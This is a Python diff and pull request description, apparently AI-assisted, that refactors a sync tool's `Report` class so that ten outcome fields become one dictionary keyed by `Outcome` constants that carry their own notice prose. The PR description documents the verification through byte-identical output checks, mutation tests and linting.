+    single `record` call beside the code that detects it, rather than an edit to
+    this class, to `notices` and to the tests in lockstep.
+
+    What is left as a field is what is genuinely a field: how much was moved, and
+    two states of the machine itself.
+    """
+
     chunks_written: int = 0
     lines_exported: int = 0
     chunks_merged: int = 0
@@ -93,52 +310,10 @@ class Report:
     #: that was already level with the remote and committed nothing sets it
     #: without sending anything, because there was nothing to send.
     pushed: bool = False
-    #: "<host>/<day>" left exactly as it was, because rebuilding it would have
-    #: needed a chunk this machine could not read. Stale rather than short: the
-    #: day keeps every line it already had, and the next sync tries again.
-    stale: set[str] = field(default_factory=set)
+    #: Every other machine whose history this run looked at, whether or not it
+    #: had anything new. Not an outcome: it is the denominator the summary line
+    #: is stated against, and there is nothing to warn about.
     hosts_seen: set[str] = field(default_factory=set)
-    #: "<host>/<day>" entries sealed before this machine was enrolled. Not an
-    #: error: it is what a freshly joined machine sees until someone runs
-    #: `grant` on a machine that was already a recipient.
-    unreadable: set[str] = field(default_factory=set)
-    #: "<host>/<day>" entries that could not be authenticated, and so were
-    #: refused rather than merged.
-    #:
-    #: One category on purpose: a manifest that is missing, malformed, signed by
-    #: the wrong key, or signed for another day are the same answer, as is a
-    #: chunk whose digest it does not list. Splitting them on the shape of the
-    #: bytes was tried and reverted, because an attacker can produce any of those
-    #: shapes at will -- so the split told the reassuring story for exactly the
-    #: case that most needed reporting.
-    unauthenticated: set[str] = field(default_factory=set)
-    #: Hosts publishing history under a signing key nobody here has accepted.
-    #: Not an error and usually not an attack. `notices` says what it is and
-    #: which command settles it -- the explanation lives there now, and this
-    #: comment carried a second, drifted copy that named `trust` where the
-    #: message on screen names `accept`.
-    untrusted: set[str] = field(default_factory=set)
-    #: Hosts now publishing under a different key than the one pinned here.
-    #: Never resolved silently; `notices` explains why and what to do.
-    changed_signer: set[str] = field(default_factory=set)
-    #: Hosts whose pin was dropped because a tombstone withdrew them.
-    unpinned: set[str] = field(default_factory=set)
-    #: Days of this machine's own history it could not extend, because the
-    #: manifest already there is one it cannot verify. `notices` explains what
-    #: that costs and why nothing is written for them.
-    unsignable: set[str] = field(default_factory=set)
-    #: Days of this machine's own history whose sealed day key has gone while
-    #: chunks sealed to its public half remain. Nothing further is written for
-    #: them, because a new key cannot rescue what the old one sealed.
-    orphaned: set[str] = field(default_factory=set)
-    #: Days this machine has published before whose signed manifest has gone.
-    #: Nothing is written for them; `notices` explains why and how to recover
-    #: the file.
-    manifest_missing: set[str] = field(default_factory=set)
-    #: "<day>/<name>" chunks sitting under *this* machine's own id that it never
-    #: published. Nothing else would ever look at them -- `merge` skips our own
-    #: id -- and they are deliberately not swept into a manifest we sign.
-    foreign: set[str] = field(default_factory=set)
     #: True when this machine's own key was withdrawn. It publishes nothing --
     #: nobody would accept it -- and reads nothing new. Recording carries on;
     #: `grant` cannot undo it, and saying otherwise would send someone to another
@@ -149,7 +324,27 @@ class Report:
     #: With per-machine signing there is no such state: publishing needs nothing
     #: from anyone, and a machine still waiting for `grant` simply reports the
     #: days it cannot read, like any other unreadable history.
+    #:
+    #: A flag rather than an `Outcome` because it has no subjects to count and it
+    #: silences every other notice; see `silent`.
     revoked: bool = False
+    #: Everything that went other than plainly, by kind. Absent means none, which
+    #: is why `record` and `subjects` exist rather than callers reaching in.
+    outcomes: dict[Outcome, set[str]] = field(default_factory=dict)
+
+    def record(self, kind: Outcome, subject: str) -> None:
+        """Note that `subject` -- a day, a host, a chunk -- came out this way."""
+        self.outcomes.setdefault(kind, set()).add(subject)
+
+    def subjects(self, kind: Outcome) -> set[str]:
+        """Everything recorded under `kind`, empty if nothing was.
+
+        For reading only. The empty case is a fresh set rather than a stored
+        one, so writing through it does nothing and `record` stays the single way
+        in -- which is what lets a kind nothing happened under simply be absent
+        from the dictionary rather than present and empty.
+        """
+        return self.outcomes.get(kind, set())
 
     @property
     def silent(self) -> bool:
@@ -170,8 +365,10 @@ class Report:
         Here rather than in `cmd_sync`, which is where all of it used to be: the
         condition, the count and the prose were eleven `if report.X:` blocks in
         the CLI, so "does this run warn about a changed signer" was a question
-        only a test that grepped stderr could ask. What each field *means* is
-        this class's to know; how it reaches a terminal is `report`'s.
+        only a test that grepped stderr could ask. Then they were eleven blocks
+        here instead, which was the same method with a better address. Now the
+        prose sits on the kind and this is the loop over them -- so a new kind
+        does not touch this at all.
 
         These are the notices this class alone decides. The paragraphs
         `cmd_grant`, `cmd_revoke`, `cmd_trust` and `cmd_accept` print are
@@ -181,6 +378,8 @@ class Report:
         would print the reasons someone might answer no after the question.
         """
         if self.silent:
+            # Not an `Outcome`: it has nothing to count, and it replaces the
+            # report rather than joining it.
             return [
                 Notice(
                     "This machine's access to the shared history was revoked, so nothing\n"
@@ -194,113 +393,10 @@ class Report:
             ]
 
         out: list[Notice] = []
-
-        def say(body: str, warning: bool = False) -> None:
-            """One notice. A helper so the prose stays at a readable column --
-            nested inside `out.append(Notice(` it started eight columns in, and
-            the one body that had to be re-wrapped for it was the one body whose
-            source lines stopped matching the lines it prints."""
-            out.append(Notice(body, warning))
-
-        if self.unreadable:
-            # The count is a local here and nowhere else, because
-            # `{len(self.unreadable)}` is twenty-two source columns for what
-            # prints as one or two -- enough to push this line past the limit and
-            # force a wrap that would stop the source reading like the output.
-            days = len(self.unreadable)
-            say(
-                f"{days} day(s) of history are sealed to recipients that do not include\n"
-                "this machine - it joined after they were written.\n"
-                f"{_GRANT_REMEDY}"
-            )
-        if self.stale:
-            say(
-                f"{len(self.stale)} day(s) could not be rebuilt, and were left exactly as\n"
-                "they were rather than rewritten from the part that could be read:\n"
-                f"{', '.join(sorted(self.stale))}\n"
-                "Nothing was lost. If it persists, a chunk of that day is damaged in this\n"
-                "checkout, or missing from it; woswoar never rewrites or deletes a chunk,\n"
-                "so 'git -C ~/.local/share/woswoar/history log --diff-filter=MD' finds who\n"
-                "did."
-            )
-        if self.untrusted:
-            say(
-                f"{len(self.untrusted)} machine(s) publish history this one has not been\n"
-                "told to accept, so none of it was merged. That is what a machine enrolled\n"
-                "since this one last looked is supposed to look like.\n"
-                "    woswoar accept"
-            )
-        if self.unpinned:
-            say(
-                f"{len(self.unpinned)} machine(s) were withdrawn by a revocation. Nothing\n"
-                "they publish is accepted here any more, including history they published\n"
-                "before it that this machine had not yet merged."
-            )
-        if self.changed_signer:
-            say(
-                f"{len(self.changed_signer)} machine(s) now sign with a different\n"
-                "key than the one accepted here, and nothing from them was merged. That is\n"
-                "either a machine that was re-enrolled or someone rewriting the repository,\n"
-                "and woswoar cannot tell which. If you re-enrolled it, accept the new key:\n"
-                "    woswoar trust --replace",
-                warning=True,
-            )
-        if self.unsignable:
-            say(
-                f"{len(self.unsignable)} day(s) of this machine's own history\n"
-                "could not be published, because the signed list already in the repository\n"
-                "for them is not one this machine can verify. Publishing a replacement\n"
-                "would disown everything it published earlier on those days.\n"
-                "If this machine's signing key was replaced, that is why: days it signed\n"
-                "with the old one stay as they are, and new days publish normally.",
-                warning=True,
-            )
-        if self.orphaned:
-            say(
-                f"{len(self.orphaned)} day(s) of this machine's own history\n"
-                f"cannot be published: {', '.join(sorted(self.orphaned))}\n"
-                "Their sealed key is missing from the repository while chunks encrypted to\n"
-                "it are still there. Those chunks are unreadable by every machine, and a\n"
-                "new key would not change that -- so nothing more is written for those\n"
-                "days rather than adding chunks nobody will ever read.\n"
-                "The commands themselves are still in this machine's own logs.\n"
-                f"{_restore_remedy('hosts/<id>/keys/<day>.age')}"
-                "'woswoar doctor' prints the host id and day. If it really is gone, delete\n"
-                "keys/<day>.pub to write the day off: the old chunks stay unreadable, but\n"
-                "this machine starts a new key and publishes again.",
-                warning=True,
-            )
-        if self.manifest_missing:
-            say(
-                f"{len(self.manifest_missing)} day(s) of this machine's own\n"
-                f"history cannot be published: {', '.join(sorted(self.manifest_missing))}\n"
-                "The signed list this machine published for them is gone from the\n"
-                "repository. Signing a replacement would name only what is written now,\n"
-                "so every chunk published earlier that day would stop being one any peer\n"
-                "accepts. Nothing is written for those days instead.\n"
-                f"{_restore_remedy('hosts/<id>/manifests/<day>')}"
-                "'woswoar doctor' prints the days.",
-                warning=True,
-            )
-        if self.foreign:
-            say(
-                f"{len(self.foreign)} chunk(s) sit under this machine's own id that it\n"
-                "never signed. They are inert: no machine will read them, including this\n"
-                "one, and nothing was lost -- whatever was in them has been published again\n"
-                "under a chunk that is signed.\n"
-                "Two things look like this and cannot be told apart from here: a run of\n"
-                "this machine that was killed between writing a chunk and signing for it,\n"
-                "and someone else writing into the repository. A power cut is the ordinary\n"
-                "explanation. 'woswoar doctor' lists them under 'chunks'."
-            )
-        if self.unauthenticated:
-            say(
-                f"{len(self.unauthenticated)} day(s) of history could not be\n"
-                "authenticated and were refused. Every machine signs a list of the chunks\n"
-                "it published, so this means the repo contains history none of your\n"
-                "machines put its name to - someone else can write to it.",
-                warning=True,
-            )
+        for kind in OUTCOMES:
+            subjects = self.subjects(kind)
+            if subjects:
+                out.append(Notice(kind.body(sorted(subjects)), kind.warning))
         return out
 
 
@@ -1311,7 +1407,7 @@ def apply_withdrawals(state: State, report: Report) -> None:
     """
     for host_id in sorted(withdrawn_hosts(state)):
         del state.signers[host_id]
-        report.unpinned.add(host_id)
+        report.record(UNPINNED, host_id)
 
 
 # ---------------------------------------------------------------------------
@@ -1625,7 +1721,7 @@ def export(known: Machine, state: State, report: Report, now: int) -> bool:
             # chunks stayed unreadable, so nothing is written. The lines stay
             # pending -- `state.exported` is not advanced -- so they are still
             # in `logs/` and publish once the sealed key is restored.
-            report.orphaned.add(day)
+            report.record(ORPHANED, day)
             continue
 
         # A manifest this machine wrote before and that is no longer there.
@@ -1645,7 +1741,7 @@ def export(known: Machine, state: State, report: Report, now: int) -> bool:
         published_before = any(relpath in state.exported for relpath, _, _ in tails)
         has_manifest = not manifest_gone(known.id, day)
         if published_before and not has_manifest:
-            report.manifest_missing.add(day)
+            report.record(MANIFEST_MISSING, day)
             continue
 
         # What this machine has already put its name to for this day. Extended,
@@ -1658,7 +1754,7 @@ def export(known: Machine, state: State, report: Report, now: int) -> bool:
             # the signed list and every peer would then refuse them -- losing
             # published history to a file somebody else was able to corrupt.
             # Nothing is written for this day, and it is reported.
-            report.unsignable.add(day)
+            report.record(UNSIGNABLE, day)
             continue
 
         for relpath, data, new_offset in tails:
@@ -1697,7 +1793,8 @@ def export(known: Machine, state: State, report: Report, now: int) -> bool:
         # every manifest, which is the cost this loop exists to avoid. A planted
         # chunk on a quiet day is refused by peers either way, because it is in
         # no manifest -- this is a report, not the defence.
-        report.foreign |= {f"{day}/{name}" for name in on_disk - set(listed)}
+        for name in on_disk - set(listed):
+            report.record(FOREIGN, f"{day}/{name}")
 
     # Set at the manifest rather than approximated by "we got past the guards".
     # A day can be refused for an orphaned key, a missing manifest or one that
@@ -1768,12 +1865,12 @@ def _trusted_signer(host_id: str, state: State, report: Report) -> str | None:
     """
     pinned = state.signers.get(host_id)
     if pinned is None:
-        report.untrusted.add(host_id)
+        report.record(UNTRUSTED, host_id)
         return None
 
     published = read_signer(host_id)
     if published and published.verify_key != pinned:
-        report.changed_signer.add(host_id)
+        report.record(CHANGED_SIGNER, host_id)
         return None
     return pinned
 
@@ -1893,7 +1990,7 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> N
                 # missing, unsigned, mis-signed or mis-addressed manifest as
                 # well as a chunk simply absent from a good one -- see
                 # `Report.unauthenticated`.
-                report.unauthenticated.add(key)
+                report.record(UNAUTHENTICATED, key)
                 continue
 
             if chunk_day not in day_keys:
@@ -1908,7 +2005,7 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> N
                     day_keys[chunk_day] = None
             secret = day_keys[chunk_day]
             if secret is None:
-                report.unreadable.add(key)
+                report.record(UNREADABLE, key)
                 continue
 
             # Authenticated before it is decrypted or decompressed, so age, zlib
@@ -1917,7 +2014,7 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> N
             try:
                 blob = open_chunk(directory / name, day.listed[name].digest)
             except (OSError, ValueError):
-                report.unauthenticated.add(key)
+                report.record(UNAUTHENTICATED, key)
                 continue
 
             try:
@@ -1929,7 +2026,7 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> N
                 # abort the sync. Aborting would block this machine's own export
                 # and every other host's readable chunks, on this run and every
                 # run after it.
-                report.unreadable.add(key)
+                report.record(UNREADABLE, key)
                 continue
 
             day.add(plaintext, report)
@@ -1965,7 +2062,7 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> N
             and bool(set(day.listed) - set(taken))
         )
         if refused:
-            report.stale.add(key)
+            report.record(STALE, key)
         else:
             day.flush(report)
             # Recorded only once the bytes are on disk. A refused rewrite that


### PR DESCRIPTION
Closes #199 — the half that issue actually asked for. #206 and #207 gave verdicts and paragraphs a shape; this collapses the fields.

## What changed

`Report` had seventeen fields. Ten were each a *kind* of outcome — a set of days, hosts or chunks — and each needed a matching branch in a 143-line `notices()` holding its count, its severity and its paragraph. Adding a sync failure mode meant editing a field, `run`, `notices` and `test_sync.py` in lockstep, and `notices()` had inherited `Report`'s job of touching all five of `sync.py`'s concerns at once.

Those ten are now one dictionary keyed by `sync.Outcome` — a declared constant carrying its own name, its severity and its prose, registering itself in declaration order as it is built:

```python
UNPINNED = Outcome(
    "unpinned",
    lambda hosts: (
        f"{len(hosts)} machine(s) were withdrawn by a revocation. Nothing\n"
        ...
    ),
)
```

`Report` is seven fields and names no kind at all. `notices()` is a loop over `OUTCOMES`. A new failure mode is one `record(UNPINNED, host_id)` call beside the code that detects it.

**The point is not fewer lines.** `sync.py` is a hundred longer, because each kind now carries the comment that used to sit on its field. The point is that a kind is *movable*: a constant, its prose and one call site — so each slice #201 carves out takes its own kinds with it, instead of leaving a method behind that binds all five concerns. That is why #203 sequenced this before #201.

## Two things deliberately kept

- **Declaration order is report order.** What `cmd_sync` printed was a fixed sequence of `if` blocks; `notices()` loops over `OUTCOMES`, not over what this run happened to record. `Report.outcomes` is a dict and dicts preserve insertion order, so the wrong loop would look right — there is a test that records every kind *backwards* and asserts the output comes out forwards.
- **`revoked` stays a flag**, not a kind. It has no subjects to count and it silences every other notice.

## Verification

**Byte-identical to `main`** — every kind alone, all ten together, the revoked path, and a clean run: 167 lines of prose, no diff. Built against a `git worktree` at `main` rather than by reading.

**Nine mutations, all caught** (`tools/mutate.py`):

```
caught  notices() loops over what the run recorded, not the declared order
caught  the subjects reach the prose unsorted
caught  a kind's declared severity is dropped on the way to the notice
caught  a newly declared kind is never registered, so it is never reported
caught  record() overwrites instead of accumulating
caught  a withdrawn peer is reported as merely untrusted
caught  a day left as it was is reported as unreadable
caught  an unsealed own day is reported as having lost its manifest
caught  an unsigned chunk under our own id goes unreported
```

The last four are the hazard this shape introduces: the kind is an argument now rather than the field name, so a detection site can name the wrong one and still compile. Three of the ten mappings are pinned that way; the rest are covered by the ~40 existing `test_sync.py` assertions, rewritten from `report.stale` to `report.subjects(sync.STALE)`.

**`sync` import cost unchanged** — 21.9 ms against 22.1 ms on `main`, best of twenty each. Matters because fourteen commands import it lazily and `prove` pulls it in whole.

903 tests, `ruff`, `ruff format`, `mypy --strict`, `shellcheck` all green.

## Tests

`TestNotices` no longer sets fields by `setattr`. Its hand-written `STATES` table stayed on purpose, reordered to report order: `sync.OUTCOMES` now carries the severity itself, so reading it off the kind and asserting it against itself would pass whatever the declaration said. `STATES` is the second opinion, and a new test ties the two lists together so a kind cannot arrive without one.

## Review

Rule 1, middle row — behaviour on a path a user reaches, aimed at the specific hazard. No agents: the diff's two ways of being wrong are lost prose and a mis-mapped kind, and both are answerable by measurement rather than by opinion, so it was a careful read of the diff plus the byte-comparison and the mutation table above.

## Not in scope

`deps.report` and `search.empty_note` are still their own shapes. `docs/architecture.md` says so and says they could convert; that is not #199's ask and is not filed, because nobody is hurt by it today.

🤖 Generated with [Claude Code](https://claude.com/claude-code)